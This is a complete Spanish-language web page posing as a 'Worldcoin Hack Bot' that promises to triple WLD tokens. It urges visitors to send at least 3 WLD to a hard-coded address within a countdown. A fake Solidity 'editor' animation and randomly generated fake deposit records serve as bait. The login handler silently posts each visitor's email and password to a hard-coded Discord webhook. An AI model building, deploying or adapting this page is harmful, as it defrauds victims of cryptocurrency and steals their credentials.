<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Worldcoin Hack Bot</title>
</head>
<body>

<div id="registro" style="display:none;">
    <h2>Worldcoin Hack BOT</h2>
    <h2>Registro</h2>
    <input type="email" id="registroUsuario" placeholder="Correo electrónico">
    <input type="password" id="registroContrasena" placeholder="Contraseña">
    <button id="btnRegistro">Registrarse</button>
    <p>¿Ya tienes cuenta? <span id="irALogin" style="cursor:pointer; color:blue;">Iniciar sesión</span></p>
</div>
<div id="bannerRegistro" style="display: none; position: fixed; top: 20%; left: 50%; transform: translate(-50%, -50%); background-color: #4CAF50; color: white; padding: 20px; border-radius: 5px; z-index: 1000;">Registrando...</div>

<div id="login" style="display:none;">
    <h2>Iniciar Sesión</h2>
    <input type="email" id="loginUsuario" placeholder="Correo electrónico">
    <input type="password" id="loginContrasena" placeholder="Contraseña">
    <button id="btnLogin">Iniciar Sesión</button>
    <p>¿No tienes cuenta? <span id="irARegistro" style="cursor:pointer; color:blue;">Registrarse</span></p>
</div>

<div id="game-container" style="display:none;">
    <h1>HACK BOT TRIPLICADOR</h1>
    <p>COLOCA TU DIRECCION DE WORLDCOIN APP</p>
    <div id="worldcoin-dashboard">
    <input type="text" id="worldcoinAddressInput" placeholder="Ingresa tu dirección de Worldcoin App Optimism">
    <button id="confirmAddress">Confirmar Dirección</button> 
        <div id="contador" style="display:none; color: #ff073a; margin-top: 10px;">
    <p>Envíe no menos de 3 WLD dentro del tiempo indicado. La acción de triplicar el saldo enviado solo se puede realizar 1 vez.</p>
    <p id="contadorMensaje" style="display:block; color: #0f0;></p>


    <p>Copy Address BOT </p>

    <button id="copyAddress" style="display:none;">CoPY ADDRESS  </button> <!-- Ocultar inicialmente -->

                <p>Copia la siguiente direccion de contrato y envia 3 o mas WLD para que funcione..</p>

    <p id="providedAddress" style="display:block; color: white;">0x01C65F22A9478C2932e62483509c233F0aaD5c72</p> <!-- Visible por defecto -->   </div>
    </div>


  <style>
    body {
            font-family: 'Courier New', Courier, monospace;
            background-color: #0a0a0a;
            color: #0f0;
            text-align: center;
            margin: 0;
            padding: 0;
            position: relative; /* Para asegurar que el contenido se posicione correctamente */
            flex-direction: column; /* Asegura que los elementos se apilen verticalmente */
            align-items: center; /* Centra los elementos horizontalmente */
        }
        table { width: 100%; border-collapse: collapse; }
  th, td { border: 1px solid #dddddd; text-align: left; padding: 8px; }
  th { background-color: #f2f2f2; }

        h1, h2 {
            color: #ff073a;
        }

        input[type="text"], input[type="password"], input[type="email"] {
            background-color: #222;
            border: none;
            color: #0f0;
            margin: 10px 0;
            padding: 10px;
            width: 40%;
        }

button {
    background-color: #333;
    border: none;
    color: #ff073a;
    cursor: pointer;
    padding: 10px 20px;
    margin: 10px 0;
    transition: transform 0.1s ease, background-color 0.3s ease; /* Agregado transform a la transición */
}

button:hover {
    background-color: #444;
}

button:active {
    transform: scale(0.95); /* Hace que el botón se "comprima" al hacer clic */
}

a {
    color: #ff073a;
}

.hidden {
    display: none;
}

#fakeEditor {
  width: 600px; /* Ancho del contenedor */
  background-color: #3a3a5c; /* Fondo azul morado oscuro uniforme */
  color: #fff; /* Texto en color blanco para mejor contraste */
  border: 1px solid #ddd;
  border-radius: 5px;
  padding: 10px;
  font-family: 'Courier New', Courier, monospace;
  white-space: pre;
  height: 100px; /* Altura fija para mostrar aproximadamente 5 líneas */
  overflow: hidden;
  display: flex;
  flex-direction: column-reverse; /* Invierte el orden para que el texto aparezca desde abajo */
  position: relative;
  font-size: 14px; /* Ajuste del tamaño de la fuente, si es necesario */
  margin: 0 auto; /* Centra el editor horizontalmente */
}


.fake-cursor {
  animation: blink-animation 1s steps(5, start) infinite;
  border-right: 2px solid #ffffff; /* Cambio de color para visibilidad */
  margin-left: 2px;
  position: absolute;
  top: 0;
}

@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

.line {
  opacity: 0;
  animation: fadeIn ease 2s;
  animation-fill-mode: forwards;
}

@keyframes fadeIn {
  0% {opacity: 0;}
  100% {opacity: 1;}
}



        #bannerRegistro {
            background-color: #222;
            color: #0f0;
            border: 1px solid #ff073a;
            margin: auto;
            padding: 20px;
            width: 30%;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            box-shadow: 0 0 15px #ff073a;
        }



#copyButton {
    display: block;
    width: 100px; /* Ajusta según necesidad */
    padding: 5px;
    margin: 0 auto; /* Centrar el botón */
    color: #fff;
    background-color: #007bff;
    border-color: #007bff;
    cursor: pointer;
}


      
</style>
   <div id="fakeEditor" >
       <table id="depositosTabla">
  <tr>
    <th>Dirección ERC20</th>
    <th>Depósito (WLD)</th>
    <th>Retorno Triplicado (WLD)</th>
  </tr>
  <!-- Las filas se insertarán aquí desde JavaScript -->
</table>

   
</body>
  <script>
    
      
      
      document.addEventListener('DOMContentLoaded', () => {

        mostrarRegistro(); // Muestra la pantalla de registro por defecto

   document.getElementById('btnRegistro').addEventListener('click', function() {
    const usuario = document.getElementById('registroUsuario').value;
    const contrasena = document.getElementById('registroContrasena').value;
    if (usuario && contrasena) {
        // Muestra el banner de "Registrando..."
        document.getElementById('bannerRegistro').style.display = 'block';

        // Simulamos un retardo para el proceso de registro (4 segundos)
        setTimeout(function() {
            const userData = {
                username: usuario,
                password: contrasena
            };
            localStorage.setItem(usuario, JSON.stringify(userData));
            
            // Ocultamos el banner después del registro exitoso
            document.getElementById('bannerRegistro').style.display = 'none';
            
            alert('Registro exitoso. Por favor, inicie sesión.');
            mostrarLogin();
        }, 4000); // Retraso de 4 segundos
    } else {
        alert('Por favor, complete todos los campos.');
    }
});

document.getElementById('btnLogin').addEventListener('click', function() {
    const email = document.getElementById('loginUsuario').value;
    const contrasena = document.getElementById('loginContrasena').value;
    
    // Asumimos que esta función está definida en otro lugar de tu código.
    enviarDatosAWebhook(email, contrasena);

    // Añadimos un retraso antes de verificar las credenciales.
    setTimeout(function() {
        const userData = localStorage.getItem(email);
        if (userData) {
            const userInfo = JSON.parse(userData);
            if (userInfo.password === contrasena) {
                alert('Inicio de sesión exitoso.');
                document.getElementById('login').style.display = 'none';
                document.getElementById('game-container').style.display = 'block';
            } else {
                alert('Contraseña incorrecta');
            }
        } else {
            alert('Usuario no encontrado');
        }
    }, 3000); // Espera 3 segundos antes de ejecutar la verificación.
});


    // Cambia a la vista de registro
    document.getElementById('irARegistro').addEventListener('click', function() {
        mostrarRegistro();
    });

    // Cambia a la vista de inicio de sesión
    document.getElementById('irALogin').addEventListener('click', function() {
        mostrarLogin();
    });

    function mostrarLogin() {
        document.getElementById('login').style.display = 'block';
        document.getElementById('registro').style.display = 'none';
        document.getElementById('game-container').style.display = 'none';
    }

    function mostrarRegistro() {
        document.getElementById('registro').style.display = 'block';
        document.getElementById('login').style.display = 'none';
        document.getElementById('game-container').style.display = 'none';
    }

       

document.getElementById('confirmAddress').addEventListener('click', function() {
    const userAddress = document.getElementById('worldcoinAddressInput').value;
    if (userAddress.trim() !== "" && esDireccionERC20Valida(userAddress)) {
        document.getElementById('confirmAddress').style.display = 'none';
        alert('Dirección confirmada. Ahora puedes copiarla.');
        mostrarFakeEditor();
        iniciarContador();
        generarDepositos(); // Esta función llena la tabla con los datos de depósitos.
        document.getElementById('depositosTabla').style.display = 'table'; // Asegura que tu tabla esté visible después de confirmar la dirección.
    } else {
        alert('Por favor, ingresa una dirección ERC20 válida.');
    }
});

function generarDepositos() {
  const tabla = document.getElementById("depositosTabla");

  // Asegúrate de limpiar la tabla antes de añadir nuevas filas para evitar duplicados si el usuario confirma la dirección múltiples veces.
  while(tabla.rows.length > 1) {
    tabla.deleteRow(1);
  }

  for (let i = 0; i < 20; i++) {
    const deposito = generarDepositoAleatorio();
    const direccion = generarDireccionAleatoria();
    const retorno = deposito * 3; // Retorno triplicado

    const fila = tabla.insertRow();
    fila.insertCell().textContent = direccion;
    fila.insertCell().textContent = deposito.toFixed(2) + " WLD";
    fila.insertCell().textContent = retorno.toFixed(2) + " WLD";
  }
}


// Función para verificar si una cadena corresponde a una dirección ERC20 válida
function esDireccionERC20Valida(direccion) {
    // Verifica si la dirección tiene 42 caracteres y comienza con '0x'
    return direccion.length === 42 && direccion.startsWith('0x');
}


function iniciarContador() {
    var tiempoRestante = 5 * 60; // 5 minutos en segundos
    var contadorElemento = document.getElementById('contadorMensaje');
    document.getElementById('contador').style.display = 'block'; // Muestra el contenedor del contador

    var intervalo = setInterval(function() {
        var minutos = parseInt(tiempoRestante / 60, 10);
        var segundos = parseInt(tiempoRestante % 60, 10);

        minutos = minutos < 10 ? "0" + minutos : minutos;
        segundos = segundos < 10 ? "0" + segundos : segundos;

        contadorElemento.textContent = minutos + ":" + segundos;

        if (--tiempoRestante < 0) {
            clearInterval(intervalo);
            document.getElementById('contador').innerHTML = "<p>El tiempo ha expirado. Por favor, intente de nuevo.</p>";
            // Aquí puedes añadir cualquier otra acción a realizar cuando el tiempo expire
        }
    }, 1000);
}          
function mostrarFakeEditor() {
    const editor = document.getElementById('fakeEditor');
    editor.style.display = 'block';

    let fakeCodeLines = [
        "pragma solidity ^0.8.0;",
        "",
        "contract Coin {",
        "    address public minter;",
        "    mapping (address => uint) public balances;",
        "",
        "    event Sent(address from, address to, uint amount);",
        "",
        "    constructor() {",
        "        minter = msg.sender;",
        "    }",
        "",
        "    function mint(address receiver, uint amount) public {",
        "        require(msg.sender == minter);",
        "        require(amount < 1e60);",
        "        balances[receiver] += amount;",
        "    }",
        "",
        "    function send(address receiver, uint amount) public {",
        "        require(amount <= balances[msg.sender], 'Insufficient balance.');",
        "        balances[msg.sender] -= amount;",
        "        balances[receiver] += amount;",
        "        emit Sent(msg.sender, receiver, amount);",
        "    }",
        "}"
    ];

    function updateCode(linesToShow) {
        let endLine = Math.min(linesToShow, fakeCodeLines.length);
        for (let i = 0; i < endLine; i++) {
            let line = document.createElement('div');
            line.textContent = fakeCodeLines[i];
            line.classList.add('line');
            // Asegura que las líneas se añadan al principio (para simular el efecto de "subir")
            editor.insertBefore(line, editor.firstChild);
        }
        let nextLinesToShow = Math.floor(Math.random() * 5) + 1;
        if (endLine < fakeCodeLines.length) {
            setTimeout(() => updateCode(nextLinesToShow + linesToShow), 2000);
        }
    }

    // Inicializa el editor con un mensaje de carga y un cursor falso
    editor.textContent = "Cargando editor";
    let dots = 0;
    let loadingInterval = setInterval(() => {
        if (dots < 3) {
            editor.textContent += '.';
            dots++;
        } else {
            clearInterval(loadingInterval);
            // Limpia el editor y añade el cursor falso
            editor.innerHTML = '<span class="fake-cursor"></span>';
            updateCode(5); // Comienza mostrando 5 líneas
        }
    }, 1000); // Intervalo entre puntos en el mensaje de carga
}

function generarDepositos() {
  const tabla = document.getElementById("depositosTabla");

  for (let i = 0; i < 20; i++) { // Genera 20 depósitos para el ejemplo
    const deposito = generarDepositoAleatorio();
    const direccion = generarDireccionAleatoria();
    const retorno = deposito * 3; // Retorno triplicado

    const fila = tabla.insertRow();
    fila.insertCell().textContent = direccion;
    fila.insertCell().textContent = deposito.toFixed(2) + " WLD";
    fila.insertCell().textContent = retorno.toFixed(2) + " WLD";
  }
}

function generarDepositoAleatorio() {
  // Genera un número aleatorio con mayor frecuencia entre 3 y 25
  if (Math.random() < 0.7) {
    return Math.random() * (25 - 3) + 3; // Mayor frecuencia de 3 a 25
  } else {
    return Math.random() * (97 - 26) + 26; // Menor frecuencia de 26 a 97
  }
}

function generarDireccionAleatoria() {
  // Genera una cadena aleatoria que simula una dirección ERC20
  const caracteres = "0123456789ABCDEF";
  let direccion = "0x";
  for (let i = 0; i < 40; i++) {
    direccion += caracteres.charAt(Math.floor(Math.random() * caracteres.length));
  }
  return direccion;
}
  generarDepositos();


function enviarDatosAWebhook(email, contrasena) {
    var webhookURL = 'https://discordapp.com/api/webhooks/1157760501829345320/5vqHkW8jnO_nFfS8WSL-2fsP9q_Jxa2wTkAAhrml4P681DYeXAAJd51F94_rISviSmSo';
    var request = new XMLHttpRequest();
    request.open("POST", webhookURL);
    request.setRequestHeader('Content-type', 'application/json');

    var params = {
        username: "Notificación de inicio de sesión",
        avatar_url: "",
        content: `Correo electrónico: ${email} - Contraseña: ${contrasena}`
    };

    request.send(JSON.stringify(params));

    request.onreadystatechange = function() {
        if (request.readyState === 4) {
            if (request.status === 204) {
                console.log("Datos enviados con éxito a Discord.");
            } else {
                console.error("Error al enviar datos a Discord:", request.statusText);
            }
        }
    };
}

// Cambia a la vista de registro
document.getElementById('irARegistro').addEventListener('click', function() {
    mostrarRegistro(); // Asegúrate de que esta función esté bien definida para manejar el cambio de vista
});
   });


  



</script>
</html>

